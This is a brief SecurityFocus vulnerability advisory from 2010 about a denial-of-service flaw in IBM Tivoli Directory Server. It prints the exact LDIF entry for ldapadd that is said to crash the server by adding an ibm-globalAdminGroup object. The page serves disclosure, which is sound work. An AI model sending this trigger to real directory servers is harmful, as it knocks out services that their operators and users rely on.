IBM Tivoli Directory Server Adding 'ibm-globalAdminGroup' Entry Denial of Service Vulnerability

An attacker can exploit this issue by using standard network utilities.

The following 'ldapadd' entry is sufficient to trigger the issue:

dn: globalGroupName=GlobalAdminGroup,cn=ibmpolicies
globalGroupName: GlobalAdminGroup
objectclass: top
objectclass: ibm-globalAdminGroup


 

Privacy Statement
Copyright 2010, SecurityFocus